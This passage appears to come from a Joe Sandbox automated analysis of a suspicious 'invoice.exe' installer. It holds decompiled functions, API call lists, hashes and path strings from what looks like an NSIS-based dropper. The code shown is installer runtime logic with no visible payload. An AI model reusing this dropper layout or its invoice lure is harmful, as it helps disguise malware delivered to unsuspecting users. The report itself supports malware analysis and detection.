                                            							ShowWindow(_t49, _t117 & 0x00000008); // executed
                                            							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100); // executed
                                            							E00404048(_t117 & 0x00000002);
                                            							_t118 = _t117 & 0x00000004;
                                            							EnableWindow( *0x429838, _t118);
                                            							__eflags = _t118 - _t134;
                                            							if(_t118 == _t134) {
                                            								_push("true");
                                            							} else {
                                            								_push(_t134);
                                            							}
                                            							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
                                            							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, "true");
                                            							__eflags =  *0x42f4ac - _t134;
                                            							if( *0x42f4ac == _t134) {
                                            								_push( *0x42a86c);
                                            							} else {
                                            								SendMessageA(_t126, 0x401, 2, _t134);
                                            								_push( *0x429838);
                                            							}
                                            							E0040405B();
                                            							E00405F65(0x42a870, E00403B33());
                                            							E00405F87(0x42a870, _t126, _t131,  &(0x42a870[lstrlenA(0x42a870)]),  *((intOrPtr*)(_t131 + 0x18)));
                                            							SetWindowTextA(_t126, 0x42a870); // executed
                                            							_push(_t134);
                                            							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                            							__eflags = _t68;
                                            							if(_t68 != 0) {
                                            								continue;
                                            							} else {
                                            								__eflags =  *_t131 - _t134;
                                            								if( *_t131 == _t134) {
                                            									continue;
                                            								}
                                            								__eflags =  *(_t131 + 4) - 5;
                                            								if( *(_t131 + 4) != 5) {
                                            									DestroyWindow( *0x42ebd8); // executed
                                            									 *0x42a048 = _t131;
                                            									__eflags =  *_t131 - _t134;
                                            									if( *_t131 <= _t134) {
                                            										goto L58;
                                            									}
                                            									_t74 = CreateDialogParamA( *0x42f400,  *_t131 +  *0x42ebe0 & 0x0000ffff, _t126,  *( *(_t131 + 4) * 4 + "oA@"), _t131); // executed
                                            									__eflags = _t74 - _t134;
                                            									 *0x42ebd8 = _t74;
                                            									if(_t74 == _t134) {
                                            										goto L58;
                                            									}
                                            									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                            									_push(6);
                                            									E00404026(_t74);
                                            									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
                                            									ScreenToClient(_t126, _t135 + 0x10);
                                            									SetWindowPos( *0x42ebd8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                            									_push(_t134);
                                            									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                            									__eflags =  *0x42ebcc - _t134; // 0x0
                                            									if(__eflags != 0) {
                                            										goto L61;
                                            									}
                                            									ShowWindow( *0x42ebd8, 8); // executed
                                            									E00404072(0x405);
                                            									goto L58;
                                            								}
                                            								__eflags =  *0x42f4ac - _t134;
                                            								if( *0x42f4ac != _t134) {
                                            									goto L61;
                                            								}
                                            								__eflags =  *0x42f4a0 - _t134;
                                            								if( *0x42f4a0 != _t134) {
                                            									continue;
                                            								}
                                            								goto L61;
                                            							}
                                            						}
                                            						DestroyWindow( *0x42ebd8);
                                            						 *0x42f408 = _t134;
                                            						EndDialog(_t126,  *0x429c40);
                                            						goto L58;
                                            					} else {
                                            						__eflags = _t35 - 1;
                                            						if(_t35 != 1) {
                                            							L33:
                                            							__eflags =  *_t131 - _t134;
                                            							if( *_t131 == _t134) {
                                            								goto L61;
                                            							}
                                            							goto L34;
                                            						}
                                            						_push(0);
                                            						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                            						__eflags = _t87;
                                            						if(_t87 == 0) {
                                            							goto L33;
                                            						}
                                            						SendMessageA( *0x42ebd8, 0x40f, 0, "true");
                                            						__eflags =  *0x42ebcc - _t134; // 0x0
                                            						return 0 | __eflags == 0x00000000;
                                            					}
                                            				} else {
                                            					_t126 = _a4;
                                            					_t134 = 0;
                                            					if(_t116 == 0x47) {
                                            						SetWindowPos( *0x42a850, _t126, 0, 0, 0, 0, 0x13);
                                            					}
                                            					if(_t116 == 5) {
                                            						asm("sbb eax, eax");
                                            						ShowWindow( *0x42a850,  ~(_a12 - 1) & _t116);
                                            					}
                                            					if(_t116 != 0x40d) {
                                            						__eflags = _t116 - 0x11;
                                            						if(_t116 != 0x11) {
                                            							__eflags = _t116 - 0x111;
                                            							if(_t116 != 0x111) {
                                            								L26:
                                            								return E0040408D(_t116, _a12, _a16);
                                            							}
                                            							_t133 = _a12 & 0x0000ffff;
                                            							_t127 = GetDlgItem(_t126, _t133);
                                            							__eflags = _t127 - _t134;
                                            							if(_t127 == _t134) {
                                            								L13:
                                            								__eflags = _t133 - 1;
                                            								if(_t133 != 1) {
                                            									__eflags = _t133 - 3;
                                            									if(_t133 != 3) {
                                            										_t128 = 2;
                                            										__eflags = _t133 - _t128;
                                            										if(_t133 != _t128) {
                                            											L25:
                                            											SendMessageA( *0x42ebd8, 0x111, _a12, _a16);
                                            											goto L26;
                                            										}
                                            										__eflags =  *0x42f4ac - _t134;
                                            										if( *0x42f4ac == _t134) {
                                            											_t100 = E0040140B(3);
                                            											__eflags = _t100;
                                            											if(_t100 != 0) {
                                            												goto L26;
                                            											}
                                            											 *0x429c40 = 1;
                                            											L21:
                                            											_push(0x78);
                                            											L22:
                                            											E00403FFF();
                                            											goto L26;
                                            										}
                                            										E0040140B(_t128);
                                            										 *0x429c40 = _t128;
                                            										goto L21;
                                            									}
                                            									__eflags =  *0x40a1dc - _t134; // 0x0
                                            									if(__eflags <= 0) {
                                            										goto L25;
                                            									}
                                            									_push(0xffffffff);
                                            									goto L22;
                                            								}
                                            								_push(_t133);
                                            								goto L22;
                                            							}
                                            							SendMessageA(_t127, 0xf3, _t134, _t134);
                                            							_t104 = IsWindowEnabled(_t127);
                                            							__eflags = _t104;
                                            							if(_t104 == 0) {
                                            								goto L61;
                                            							}
                                            							goto L13;
                                            						}
                                            						SetWindowLongA(_t126, _t134, _t134);
                                            						return 1;
                                            					} else {
                                            						DestroyWindow( *0x42ebd8);
                                            						 *0x42ebd8 = _a12;
                                            						L58:
                                            						if( *0x42b870 == _t134) {
                                            							_t143 =  *0x42ebd8 - _t134; // 0x103bc
                                            							if(_t143 != 0) {
                                            								ShowWindow(_t126, 0xa); // executed
                                            								 *0x42b870 = 1;
                                            							}
                                            						}
                                            						L61:
                                            						return 0;
                                            					}
                                            				}
                                            			}































                                            APIs
                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B8E
                                            • ShowWindow.USER32(?), ref: 00403BAB
                                            • DestroyWindow.USER32 ref: 00403BBF
                                            • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BDB
                                            • GetDlgItem.USER32(?,?), ref: 00403BFC
                                            • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C10
                                            • IsWindowEnabled.USER32(00000000), ref: 00403C17
                                            • GetDlgItem.USER32(?,?), ref: 00403CC5
                                            • GetDlgItem.USER32(?,00000002), ref: 00403CCF
                                            • SetClassLongA.USER32(?,000000F2,?), ref: 00403CE9
                                            • SendMessageA.USER32(0000040F,00000000,?,?), ref: 00403D3A
                                            • GetDlgItem.USER32(?,00000003), ref: 00403DE0
                                            • ShowWindow.USER32(00000000,?), ref: 00403E01
                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E13
                                            • EnableWindow.USER32(?,?), ref: 00403E2E
                                            • GetSystemMenu.USER32(?,00000000,0000F060,?), ref: 00403E44
                                            • EnableMenuItem.USER32(00000000), ref: 00403E4B
                                            • SendMessageA.USER32(?,000000F4,00000000,?), ref: 00403E63
                                            • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E76
                                            • lstrlenA.KERNEL32(Yllerion Setup: Installing,?,Yllerion Setup: Installing,00000000), ref: 00403EA0
                                            • SetWindowTextA.USER32(?,Yllerion Setup: Installing), ref: 00403EAF
                                            • ShowWindow.USER32(?,0000000A), ref: 00403FE3
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                            • String ID: Yllerion Setup: Installing
                                            • API String ID: 3282139019-2322757991
                                            • Opcode ID: a610b2fa877343fbf3bdc554c55ad236ee119dc4ae72ad2b999ac5e47659cd96
                                            • Instruction ID: 825bbfaa6b66e15a56cde4951677423d70b10f791e0768be12abaf391e468a8e
                                            • Opcode Fuzzy Hash: a610b2fa877343fbf3bdc554c55ad236ee119dc4ae72ad2b999ac5e47659cd96
                                            • Instruction Fuzzy Hash: 80C19F71604205AFDB206F22EE45E2B3EBCFB4570AF40053EFA42B11E1CB7999429B1D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            [Control-flow graph for function 004037B5 not reproduced; node legend: Executed, Not Executed]
                                            C-Code - Quality: 96%
                                            			E004037B5(void* __eflags) {
                                            				intOrPtr _v4;
                                            				intOrPtr _v8;
                                            				int _v12;
                                            				void _v16;
                                            				void* __ebx;
                                            				void* __edi;
                                            				void* __esi;
                                            				intOrPtr* _t17;
                                            				void* _t25;
                                            				void* _t27;
                                            				int _t28;
                                            				void* _t31;
                                            				int _t34;
                                            				int _t35;
                                            				intOrPtr _t36;
                                            				int _t39;
                                            				char _t57;
                                            				CHAR* _t59;
                                            				signed char _t63;
                                            				CHAR* _t74;
                                            				intOrPtr _t76;
                                            				CHAR* _t81;
                                            
                                            				_t76 =  *0x42f414;
                                            				_t17 = E004062FD(2);
                                            				_t84 = _t17;
                                            				if(_t17 == 0) {
                                            					_t74 = 0x42a870;
                                            					"1033" = 0x30;
                                            					 *0x436001 = 0x78;
                                            					 *0x436002 = 0;
                                            					E00405E4C(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x42a870, 0);
                                            					__eflags =  *0x42a870; // 0x59
                                            					if(__eflags == 0) {
                                            						E00405E4C(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040835A, 0x42a870, 0);
                                            					}
                                            					lstrcatA("1033", _t74);
                                            				} else {
                                            					E00405EC3("1033",  *_t17() & 0x0000ffff);
                                            				}
                                            				E00403A7A(_t71, _t84);
                                            				_t80 = "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository";
                                            				 *0x42f4a0 =  *0x42f41c & 0x00000020;
                                            				 *0x42f4bc = 0x10000;
                                            				if(E004059EB(_t84, "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository") != 0) {
                                            					L16:
                                            					if(E004059EB(_t92, _t80) == 0) {
                                            						E00405F87(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118))); // executed
                                            					}
                                            					_t25 = LoadImageA( *0x42f400, 0x67, "true", 0, 0, 0x8040); // executed
                                            					 *0x42ebe8 = _t25;
                                            					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
                                            						L21:
                                            						if(E0040140B(0) == 0) {
                                            							_t27 = E00403A7A(_t71, __eflags);
                                            							__eflags =  *0x42f4c0;
                                            							if( *0x42f4c0 != 0) {
                                            								_t28 = E0040515E(_t27, 0);
                                            								__eflags = _t28;
                                            								if(_t28 == 0) {
                                            									E0040140B("true");
                                            									goto L33;
                                            								}
                                            								__eflags =  *0x42ebcc; // 0x0
                                            								if(__eflags == 0) {
                                            									E0040140B(2);
                                            								}
                                            								goto L22;
                                            							}
                                            							ShowWindow( *0x42a850, 5); // executed
                                            							_t34 = E0040628F("RichEd20"); // executed
                                            							__eflags = _t34;
                                            							if(_t34 == 0) {
                                            								E0040628F("RichEd32");
                                            							}
                                            							_t81 = "RichEdit20A";
                                            							_t35 = GetClassInfoA(0, _t81, 0x42eba0);
                                            							__eflags = _t35;
                                            							if(_t35 == 0) {
                                            								GetClassInfoA(0, "RichEdit", 0x42eba0);
                                            								 *0x42ebc4 = _t81;
                                            								RegisterClassA(0x42eba0);
                                            							}
                                            							_t36 =  *0x42ebe0; // 0x0
                                            							_t39 = DialogBoxParamA( *0x42f400, _t36 + 0x00000069 & 0x0000ffff, 0, E00403B52, 0); // executed
                                            							E00403705(E0040140B(5), "true");
                                            							return _t39;
                                            						}
                                            						L22:
                                            						_t31 = 2;
                                            						return _t31;
                                            					} else {
                                            						_t71 =  *0x42f400;
                                            						 *0x42eba4 = E00401000;
                                            						 *0x42ebb0 =  *0x42f400;
                                            						 *0x42ebb4 = _t25;
                                            						 *0x42ebc4 = 0x40a1f4;
                                            						if(RegisterClassA(0x42eba0) == 0) {
                                            							L33:
                                            							__eflags = 0;
                                            							return 0;
                                            						}
                                            						SystemParametersInfoA(0x30, 0,  &_v16, 0);
                                            						 *0x42a850 = CreateWindowExA(0x80, 0x40a1f4, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42f400, 0);
                                            						goto L21;
                                            					}
                                            				} else {
                                            					_t71 =  *(_t76 + 0x48);
                                            					_t86 = _t71;
                                            					if(_t71 == 0) {
                                            						goto L16;
                                            					}
                                            					_t74 = 0x42e3a0;
                                            					E00405E4C(_t71, _t86,  *((intOrPtr*)(_t76 + 0x44)), _t71,  *((intOrPtr*)(_t76 + 0x4c)) +  *0x42f458, 0x42e3a0, 0);
                                            					_t57 =  *0x42e3a0; // 0x43
                                            					if(_t57 == 0) {
                                            						goto L16;
                                            					}
                                            					if(_t57 == 0x22) {
                                            						_t74 = 0x42e3a1;
                                            						 *((char*)(E00405928(0x42e3a1, 0x22))) = 0;
                                            					}
                                            					_t59 = lstrlenA(_t74) + _t74 - 4;
                                            					if(_t59 <= _t74 || lstrcmpiA(_t59, ".exe") != 0) {
                                            						L15:
                                            						E00405F65(_t80, E004058FD(_t74));
                                            						goto L16;
                                            					} else {
                                            						_t63 = GetFileAttributesA(_t74);
                                            						if(_t63 == 0xffffffff) {
                                            							L14:
                                            							E00405944(_t74);
                                            							goto L15;
                                            						}
                                            						_t92 = _t63 & 0x00000010;
                                            						if((_t63 & 0x00000010) != 0) {
                                            							goto L15;
                                            						}
                                            						goto L14;
                                            					}
                                            				}
                                            			}


























                                            APIs
                                              • Part of subcall function 004062FD: GetModuleHandleA.KERNEL32(?,?,?,00403264,0000000A), ref: 0040630F
                                              • Part of subcall function 004062FD: GetProcAddress.KERNEL32(00000000,?), ref: 0040632A
                                            • lstrcatA.KERNEL32(1033,Yllerion Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Yllerion Setup: Installing,00000000,00000002,76793410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\invoice.exe",00000000), ref: 00403830
                                            • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository,1033,Yllerion Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Yllerion Setup: Installing,00000000,00000002,76793410), ref: 004038A5
                                            • lstrcmpiA.KERNEL32(?,.exe), ref: 004038B8
                                            • GetFileAttributesA.KERNEL32(Call), ref: 004038C3
                                            • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository), ref: 0040390C
                                              • Part of subcall function 00405EC3: wsprintfA.USER32 ref: 00405ED0
                                            • RegisterClassA.USER32(0042EBA0), ref: 00403949
                                            • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403961
                                            • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403996
                                            • ShowWindow.USER32(00000005,00000000), ref: 004039CC
                                            • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBA0), ref: 004039F8
                                            • GetClassInfoA.USER32(00000000,RichEdit,0042EBA0), ref: 00403A05
                                            • RegisterClassA.USER32(0042EBA0), ref: 00403A0E
                                            • DialogBoxParamA.USER32(?,00000000,00403B52,00000000), ref: 00403A2D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: "C:\Users\user\Desktop\invoice.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\predepository$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Yllerion Setup: Installing$_Nb
                                            • API String ID: 1975747703-2461847341
                                            • Opcode ID: 0f9bd367d977802c11df8505ea4cdc09ad3fea20ebf391e442548ca576291c4a
                                            • Instruction ID: cf57693f3f88dc886a5042f17341946b18930627488d4c28d640959b633c26bb
                                            • Opcode Fuzzy Hash: 0f9bd367d977802c11df8505ea4cdc09ad3fea20ebf391e442548ca576291c4a
                                            • Instruction Fuzzy Hash: 3E61D770240600AED620BB669D45F373EACEB44749F40447EF985B22E2DB7C9D029A2D
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            [Control-flow graph for function 00405F87 not reproduced; node legend: Executed, Not Executed]
                                            C-Code - Quality: 72%
                                            			E00405F87(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                            				struct _ITEMIDLIST* _v8;
                                            				char _v12;
                                            				signed int _v16;
                                            				signed char _v20;
                                            				signed int _v24;
                                            				signed char _v28;
                                            				signed int _t38;
                                            				CHAR* _t39;
                                            				signed int _t41;
                                            				char _t52;
                                            				char _t53;
                                            				char _t55;
                                            				char _t57;
                                            				void* _t65;
                                            				char* _t66;
                                            				signed int _t80;
                                            				intOrPtr _t86;
                                            				char _t88;
                                            				void* _t89;
                                            				CHAR* _t90;
                                            				void* _t92;
                                            				signed int _t97;
                                            				signed int _t99;
                                            				void* _t100;
                                            
                                            				_t92 = __esi;
                                            				_t89 = __edi;
                                            				_t65 = __ebx;
                                            				_t38 = _a8;
                                            				if(_t38 < 0) {
                                            					_t86 =  *0x42ebdc; // 0x67efe9
                                            					_t38 =  *(_t86 - 4 + _t38 * 4);
                                            				}
                                            				_push(_t65);
                                            				_push(_t92);
                                            				_push(_t89);
                                            				_t66 = _t38 +  *0x42f458;
                                            				_t39 = 0x42e3a0;
                                            				_t90 = 0x42e3a0;
                                            				if(_a4 >= 0x42e3a0 && _a4 - 0x42e3a0 < 0x800) {
                                            					_t90 = _a4;
                                            					_a4 = _a4 & 0x00000000;
                                            				}
                                            				while(1) {
                                            					_t88 =  *_t66;
                                            					if(_t88 == 0) {
                                            						break;
                                            					}
                                            					__eflags = _t90 - _t39 - 0x400;
                                            					if(_t90 - _t39 >= 0x400) {
                                            						break;
                                            					}
                                            					_t66 = _t66 + 1;
                                            					__eflags = _t88 - 4;
                                            					_a8 = _t66;
                                            					if(__eflags >= 0) {
                                            						if(__eflags != 0) {
                                            							 *_t90 = _t88;
                                            							_t90 =  &(_t90[1]);
                                            							__eflags = _t90;
                                            						} else {
                                            							 *_t90 =  *_t66;
                                            							_t90 =  &(_t90[1]);
                                            							_t66 = _t66 + 1;
                                            						}
                                            						continue;
                                            					}
                                            					_t41 =  *((char*)(_t66 + 1));
                                            					_t80 =  *_t66;
                                            					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                            					_v24 = _t80;
                                            					_v28 = _t80 | 0x00000080;
                                            					_v16 = _t41;
                                            					_v20 = _t41 | 0x00000080;
                                            					_t66 = _a8 + 2;
                                            					__eflags = _t88 - 2;
                                            					if(_t88 != 2) {
                                            						__eflags = _t88 - 3;
                                            						if(_t88 != 3) {
                                            							__eflags = _t88 - 1;
                                            							if(_t88 == 1) {
                                            								__eflags = (_t41 | 0xffffffff) - _t97;
                                            								E00405F87(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                            							}
                                            							L42:
                                            							_t90 =  &(_t90[lstrlenA(_t90)]);
                                            							_t39 = 0x42e3a0;
                                            							continue;
                                            						}
                                            						__eflags = _t97 - 0x1d;
                                            						if(_t97 != 0x1d) {
                                            							__eflags = (_t97 << 0xa) + 0x430000;
                                            							E00405F65(_t90, (_t97 << 0xa) + 0x430000);
                                            						} else {
                                            							E00405EC3(_t90,  *0x42f408);
                                            						}
                                            						__eflags = _t97 + 0xffffffeb - 7;
                                            						if(_t97 + 0xffffffeb < 7) {
                                            							L33:
                                            							E004061CF(_t90);
                                            						}
                                            						goto L42;
                                            					}
                                            					_t52 =  *0x42f40c;
                                            					__eflags = _t52;
                                            					_t99 = 2;
                                            					if(_t52 >= 0) {
                                            						L13:
                                            						_a8 = 1;
                                            						L14:
                                            						__eflags =  *0x42f4a4;
                                            						if( *0x42f4a4 != 0) {
                                            							_t99 = 4;
                                            						}
                                            						__eflags = _t80;
                                            						if(__eflags >= 0) {
                                            							__eflags = _t80 - 0x25;
                                            							if(_t80 != 0x25) {
                                            								__eflags = _t80 - 0x24;
                                            								if(_t80 == 0x24) {
                                            									GetWindowsDirectoryA(_t90, 0x400);
                                            									_t99 = 0;
                                            								}
                                            								while(1) {
                                            									__eflags = _t99;
                                            									if(_t99 == 0) {
                                            										goto L30;
                                            									}
                                            									_t53 =  *0x42f404;
                                            									_t99 = _t99 - 1;
                                            									__eflags = _t53;
                                            									if(_t53 == 0) {
                                            										L26:
                                            										_t55 = SHGetSpecialFolderLocation( *0x42f408,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                            										__eflags = _t55;
                                            										if(_t55 != 0) {
                                            											L28:
                                            											 *_t90 =  *_t90 & 0x00000000;
                                            											__eflags =  *_t90;
                                            											continue;
                                            										}
                                            										__imp__SHGetPathFromIDListA(_v8, _t90);
                                            										_v12 = _t55;
                                            										__imp__CoTaskMemFree(_v8);
                                            										__eflags = _v12;
                                            										if(_v12 != 0) {
                                            											goto L30;
                                            										}
                                            										goto L28;
                                            									}
                                            									__eflags = _a8;
                                            									if(_a8 == 0) {
                                            										goto L26;
                                            									}
                                            									_t57 =  *_t53( *0x42f408,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90); // executed
                                            									__eflags = _t57;
                                            									if(_t57 == 0) {
                                            										goto L30;
                                            									}
                                            									goto L26;
                                            								}
                                            								goto L30;
                                            							}
                                            							GetSystemDirectoryA(_t90, 0x400);
                                            							goto L30;
                                            						} else {
                                            							E00405E4C((_t80 & 0x0000003f) +  *0x42f458, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x42f458, _t90, _t80 & 0x00000040); // executed
                                            							__eflags =  *_t90;
                                            							if( *_t90 != 0) {
                                            								L31:
                                            								__eflags = _v16 - 0x1a;
                                            								if(_v16 == 0x1a) {
                                            									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                            								}
                                            								goto L33;
                                            							}
                                            							E00405F87(_t66, _t90, _t99, _t90, _v16);
                                            							L30:
                                            							__eflags =  *_t90;
                                            							if( *_t90 == 0) {
                                            								goto L33;
                                            							}
                                            							goto L31;
                                            						}
                                            					}
                                            					__eflags = _t52 - 0x5a04;
                                            					if(_t52 == 0x5a04) {
                                            						goto L13;
                                            					}
                                            					__eflags = _v16 - 0x23;
                                            					if(_v16 == 0x23) {
                                            						goto L13;
                                            					}
                                            					__eflags = _v16 - 0x2e;
                                            					if(_v16 == 0x2e) {
                                            						goto L13;
                                            					} else {
                                            						_a8 = _a8 & 0x00000000;
                                            						goto L14;
                                            					}
                                            				}
                                            				 *_t90 =  *_t90 & 0x00000000;
                                            				if(_a4 == 0) {
                                            					return _t39;
                                            				}
                                            				return E00405F65(_a4, _t39);
                                            			}




























                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004060B2
                                            • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,004050C4,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000), ref: 004060C5
                                            • SHGetSpecialFolderLocation.SHELL32(004050C4,767923A0,?,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,004050C4,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000), ref: 00406101
                                            • SHGetPathFromIDListA.SHELL32(767923A0,Call), ref: 0040610F
                                            • CoTaskMemFree.OLE32(767923A0), ref: 0040611B
                                            • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040613F
                                            • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,004050C4,Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll,00000000,00000000,0041C028,767923A0), ref: 00406191
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.8701290235.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.8701257617.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701345270.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043B000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701375058.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                            • Associated: 00000001.00000002.8701752118.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_invoice.jbxd
                                            Similarity
                                            • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                            • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nstA9F8.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$g
                                            • API String ID: 717251189-2197224430
                                            • Opcode ID: 5106712905544f5ba106292216a6fc296fbdb3386ca655048f42707a8493570e
                                            • Instruction ID: 1b13e8ff18f2312f61c88a614d7ce51b6c0fc9f7833a06fa9902b6248b39176d
                                            • Opcode Fuzzy Hash: 5106712905544f5ba106292216a6fc296fbdb3386ca655048f42707a8493570e
                                            • Instruction Fuzzy Hash: D561F170A00105AEDF20AF24CC90BBB3BA5EB55314F56413FE903BA2D2C67D4962CB5E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Control-flow Graph

                                            [Control-flow graph of function 00401759; legend: Executed / Not Executed]
                                            C-Code - Quality: 60%
                                            			E00401759(FILETIME* __ebx, void* __eflags) {
                                            				void* _t33;
                                            				void* _t41;
                                            				void* _t43;
                                            				FILETIME* _t49;
                                            				FILETIME* _t62;
                                            				void* _t64;
                                            				signed int _t70;
                                            				FILETIME* _t71;
                                            				FILETIME* _t75;
                                            				signed int _t77;
                                            				void* _t80;
                                            				CHAR* _t82;
                                            				void* _t85;
                                            
                                            				_t75 = __ebx;
                                            				_t82 = E00402AC1(0x31);
                                            				 *(_t85 - 8) = _t82;
                                            				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                            				_t33 = E0040596A(_t82);
                                            				_push(_t82);
                                            				if(_t33 == 0) {
                                            					lstrcatA(E004058FD(E00405F65(0x40a418, "C:\\Users\\Arthur\\AppData\\Local\\Microsoft\\Windows\\INetCache\\predepository\\Diskofils\\Justiciaryship")), ??);
                                            				} else {
                                            					_push(0x40a418);
                                            					E00405F65();
                                            				}
                                            				E004061CF(0x40a418);
                                            				while(1) {
                                            					__eflags =  *(_t85 + 8) - 3;
                                            					if( *(_t85 + 8) >= 3) {
                                            						_t64 = E00406268(0x40a418);
                                            						_t77 = 0;
                                            						__eflags = _t64 - _t75;
                                            						if(_t64 != _t75) {
                                            							_t71 = _t64 + 0x14;
                                            							__eflags = _t71;
                                            							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                            						}
                                            						asm("sbb eax, eax");
                                            						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                            						__eflags = _t70;
